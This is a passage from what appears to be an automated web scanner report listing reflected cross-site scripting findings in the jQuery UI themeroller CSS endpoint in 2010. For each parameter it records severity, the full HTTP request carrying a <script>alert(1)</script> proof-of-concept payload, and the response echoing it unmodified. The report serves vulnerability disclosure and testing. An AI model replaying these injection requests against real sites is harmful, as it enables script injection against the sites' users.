GET /themeroller/css/parseTheme.css.php?tr&ffDefault=Helvetica,+Arial,+sans-serif&fwDefault=normal&fsDefault=1.1&fsDefaultUnit=em&cornerRadius=5&cornerRadiusUnit=px&bgColorHeader=888888&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=15&borderColorHeader=404040&fcHeader=ffffff&iconColorHeader=cccccc&bgColorContent=121212&bgTextureContent=12_gloss_wave.png&bgImgOpacityContent=16&borderColorContent=404040&fcContent=eeeeee&iconColorContent=bbbbbb&bgColorDefault=adadad&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=35&borderColorDefault=cccccc&fcDefault=333333&iconColorDefault=666666d091e<script>alert(1)</script>c202334ef47&bgColorHover=dddddd&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=60&borderColorHover=dddddd&fcHover=000000&iconColorHover=c98000&bgColorActive=121212&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=15&borderColorActive=000000&fcActive=ffffff&iconColorActive=f29a00&bgColorHighlight=555555&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=404040&fcHighlight=cccccc&iconColorHighlight=aaaaaa&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:35 GMT
Content-Type: text/css
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 17804

/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
nt=404040&fcContent=eeeeee&iconColorContent=bbbbbb&bgColorDefault=adadad&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=35&borderColorDefault=cccccc&fcDefault=333333&iconColorDefault=666666d091e<script>alert(1)</script>c202334ef47&bgColorHover=dddddd&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=60&borderColorHover=dddddd&fcHover=000000&iconColorHover=c98000&bgColorActive=121212&bgTextureActive=05_inset_soft.png&bgImgO
...[SNIP]...

1.230. http://jqueryui.com/themeroller/css/parseTheme.css.php [iconColorError parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/css/parseTheme.css.php

Issue detail

The value of the iconColorError request parameter is copied into the HTML document as plain text between tags. The payload e0185<script>alert(1)</script>0d9e7bc760c was submitted in the iconColorError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?tr&ffDefault=Helvetica,+Arial,+sans-serif&fwDefault=normal&fsDefault=1.1&fsDefaultUnit=em&cornerRadius=5&cornerRadiusUnit=px&bgColorHeader=888888&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=15&borderColorHeader=404040&fcHeader=ffffff&iconColorHeader=cccccc&bgColorContent=121212&bgTextureContent=12_gloss_wave.png&bgImgOpacityContent=16&borderColorContent=404040&fcContent=eeeeee&iconColorContent=bbbbbb&bgColorDefault=adadad&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=35&borderColorDefault=cccccc&fcDefault=333333&iconColorDefault=666666&bgColorHover=dddddd&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=60&borderColorHover=dddddd&fcHover=000000&iconColorHover=c98000&bgColorActive=121212&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=15&borderColorActive=000000&fcActive=ffffff&iconColorActive=f29a00&bgColorHighlight=555555&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=404040&fcHighlight=cccccc&iconColorHighlight=aaaaaa&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0ae0185<script>alert(1)</script>0d9e7bc760c HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:20 GMT
Content-Type: text/css
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 17804

/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
orderColorHighlight=404040&fcHighlight=cccccc&iconColorHighlight=aaaaaa&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0ae0185<script>alert(1)</script>0d9e7bc760c
*/

/* Component containers
----------------------------------*/
.ui-widget { font-family: Helvetica, Arial, sans-serif; font-size: 1.1em; }
.ui-widget input, .ui-widget select, .ui-widget textarea,
...[SNIP]...

1.231. http://jqueryui.com/themeroller/css/parseTheme.css.php [iconColorHeader parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/css/parseTheme.css.php

Issue detail

The value of the iconColorHeader request parameter is copied into the HTML document as plain text between tags. The payload 4b955<script>alert(1)</script>7a2c3ff20fb was submitted in the iconColorHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?tr&ffDefault=Helvetica,+Arial,+sans-serif&fwDefault=normal&fsDefault=1.1&fsDefaultUnit=em&cornerRadius=5&cornerRadiusUnit=px&bgColorHeader=888888&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=15&borderColorHeader=404040&fcHeader=ffffff&iconColorHeader=cccccc4b955<script>alert(1)</script>7a2c3ff20fb&bgColorContent=121212&bgTextureContent=12_gloss_wave.png&bgImgOpacityContent=16&borderColorContent=404040&fcContent=eeeeee&iconColorContent=bbbbbb&bgColorDefault=adadad&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=35&borderColorDefault=cccccc&fcDefault=333333&iconColorDefault=666666&bgColorHover=dddddd&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=60&borderColorHover=dddddd&fcHover=000000&iconColorHover=c98000&bgColorActive=121212&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=15&borderColorActive=000000&fcActive=ffffff&iconColorActive=f29a00&bgColorHighlight=555555&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=404040&fcHighlight=cccccc&iconColorHighlight=aaaaaa&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:29 GMT
Content-Type: text/css
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 17804

/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
=1.1&fsDefaultUnit=em&cornerRadius=5&cornerRadiusUnit=px&bgColorHeader=888888&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=15&borderColorHeader=404040&fcHeader=ffffff&iconColorHeader=cccccc4b955<script>alert(1)</script>7a2c3ff20fb&bgColorContent=121212&bgTextureContent=12_gloss_wave.png&bgImgOpacityContent=16&borderColorContent=404040&fcContent=eeeeee&iconColorContent=bbbbbb&bgColorDefault=adadad&bgTextureDefault=03_highlight_s
...[SNIP]...

1.232. http://jqueryui.com/themeroller/css/parseTheme.css.php [iconColorHighlight parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/css/parseTheme.css.php

Issue detail

The value of the iconColorHighlight request parameter is copied into the HTML document as plain text between tags. The payload f5abc<script>alert(1)</script>ccb629bd428 was submitted in the iconColorHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?tr&ffDefault=Helvetica,+Arial,+sans-serif&fwDefault=normal&fsDefault=1.1&fsDefaultUnit=em&cornerRadius=5&cornerRadiusUnit=px&bgColorHeader=888888&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=15&borderColorHeader=404040&fcHeader=ffffff&iconColorHeader=cccccc&bgColorContent=121212&bgTextureContent=12_gloss_wave.png&bgImgOpacityContent=16&borderColorContent=404040&fcContent=eeeeee&iconColorContent=bbbbbb&bgColorDefault=adadad&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=35&borderColorDefault=cccccc&fcDefault=333333&iconColorDefault=666666&bgColorHover=dddddd&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=60&borderColorHover=dddddd&fcHover=000000&iconColorHover=c98000&bgColorActive=121212&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=15&borderColorActive=000000&fcActive=ffffff&iconColorActive=f29a00&bgColorHighlight=555555&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=404040&fcHighlight=cccccc&iconColorHighlight=aaaaaaf5abc<script>alert(1)</script>ccb629bd428&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:06 GMT
Content-Type: text/css
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 17804

/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
fcActive=ffffff&iconColorActive=f29a00&bgColorHighlight=555555&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=404040&fcHighlight=cccccc&iconColorHighlight=aaaaaaf5abc<script>alert(1)</script>ccb629bd428&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a
*/

/* Component containers
----------------------------------*/
.ui-
...[SNIP]...

1.233. http://jqueryui.com/themeroller/css/parseTheme.css.php [iconColorHover parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/css/parseTheme.css.php

Issue detail

The value of the iconColorHover request parameter is copied into the HTML document as plain text between tags. The payload 78868<script>alert(1)</script>9f0a3b0a7e1 was submitted in the iconColorHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?tr&ffDefault=Helvetica,+Arial,+sans-serif&fwDefault=normal&fsDefault=1.1&fsDefaultUnit=em&cornerRadius=5&cornerRadiusUnit=px&bgColorHeader=888888&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=15&borderColorHeader=404040&fcHeader=ffffff&iconColorHeader=cccccc&bgColorContent=121212&bgTextureContent=12_gloss_wave.png&bgImgOpacityContent=16&borderColorContent=404040&fcContent=eeeeee&iconColorContent=bbbbbb&bgColorDefault=adadad&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=35&borderColorDefault=cccccc&fcDefault=333333&iconColorDefault=666666&bgColorHover=dddddd&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=60&borderColorHover=dddddd&fcHover=000000&iconColorHover=c9800078868<script>alert(1)</script>9f0a3b0a7e1&bgColorActive=121212&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=15&borderColorActive=000000&fcActive=ffffff&iconColorActive=f29a00&bgColorHighlight=555555&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=404040&fcHighlight=cccccc&iconColorHighlight=aaaaaa&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:51 GMT
Content-Type: text/css
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 17804

/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
erColorDefault=cccccc&fcDefault=333333&iconColorDefault=666666&bgColorHover=dddddd&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=60&borderColorHover=dddddd&fcHover=000000&iconColorHover=c9800078868<script>alert(1)</script>9f0a3b0a7e1&bgColorActive=121212&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=15&borderColorActive=000000&fcActive=ffffff&iconColorActive=f29a00&bgColorHighlight=555555&bgTextureHighlight=04_highlight_har
...[SNIP]...

1.234. http://jqueryui.com/themeroller/css/parseTheme.css.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/css/parseTheme.css.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload cd043<script>alert(1)</script>c4492da250c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?ctl=themeroller&cd043<script>alert(1)</script>c4492da250c=1 HTTP/1.1
Accept: */*
Referer: http://jqueryui.com/themeroller/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: jqueryui.com
Proxy-Connection: Keep-Alive
Cookie: __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmb=77982607.2.10.1289873280; __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmc=77982607

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:11:24 GMT
Content-Type: text/css
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 16602

/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify this theme, visit http://jqueryui.com/themeroller/?ctl=themeroller&cd043<script>alert(1)</script>c4492da250c=1
*/

/* Component containers
----------------------------------*/
.ui-widget { font-family: Verdana,Arial,sans-serif; font-size: 1.1em; }
.ui-widget input, .ui-widget select, .ui-widget textarea, .u
...[SNIP]...

1.235. http://jqueryui.com/themeroller/css/parseTheme.css.php [offsetLeftShadow parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/css/parseTheme.css.php

Issue detail

The value of the offsetLeftShadow request parameter is copied into the HTML document as plain text between tags. The payload 50f6b<script>alert(1)</script>2cd38601b35 was submitted in the offsetLeftShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?ffDefault=Trebuchet+MS,+Tahoma,+Verdana,+Arial,+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px50f6b<script>alert(1)</script>2cd38601b35&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:25 GMT
Content-Type: text/css
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 18085

/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px50f6b<script>alert(1)</script>2cd38601b35&cornerRadiusShadow=5px
*/

/* Component containers
----------------------------------*/
.ui-widget { font-family: Trebuchet MS, Tahoma, Verdana, Arial, sans-serif; font-size: 1.1em; }
.ui-widget inpu
...[SNIP]...

1.236. http://jqueryui.com/themeroller/css/parseTheme.css.php [offsetTopShadow parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/css/parseTheme.css.php

Issue detail

The value of the offsetTopShadow request parameter is copied into the HTML document as plain text between tags. The payload 6a5ea<script>alert(1)</script>88149c19cc2 was submitted in the offsetTopShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?ffDefault=Trebuchet+MS,+Tahoma,+Verdana,+Arial,+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px6a5ea<script>alert(1)</script>88149c19cc2&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:25 GMT
Content-Type: text/css
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 18085

/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
eOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px6a5ea<script>alert(1)</script>88149c19cc2&offsetLeftShadow=-5px&cornerRadiusShadow=5px
*/

/* Component containers
----------------------------------*/
.ui-widget { font-family: Trebuchet MS, Tahoma, Verdana, Arial, sans-serif; font-size: 1.
...[SNIP]...

1.237. http://jqueryui.com/themeroller/css/parseTheme.css.php [opacityOverlay parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/css/parseTheme.css.php

Issue detail

The value of the opacityOverlay request parameter is copied into the HTML document as plain text between tags. The payload 3ac82<script>alert(1)</script>50174dfe896 was submitted in the opacityOverlay parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?ffDefault=Trebuchet+MS,+Tahoma,+Verdana,+Arial,+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=503ac82<script>alert(1)</script>50174dfe896&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:23 GMT
Content-Type: text/css
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 18126

/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
gonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=503ac82<script>alert(1)</script>50174dfe896&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px
*/

/* Component containe
...[SNIP]...

1.238. http://jqueryui.com/themeroller/css/parseTheme.css.php [opacityShadow parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/css/parseTheme.css.php

Issue detail

The value of the opacityShadow request parameter is copied into the HTML document as plain text between tags. The payload 9d5c2<script>alert(1)</script>c3400b0d188 was submitted in the opacityShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?ffDefault=Trebuchet+MS,+Tahoma,+Verdana,+Arial,+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=209d5c2<script>alert(1)</script>c3400b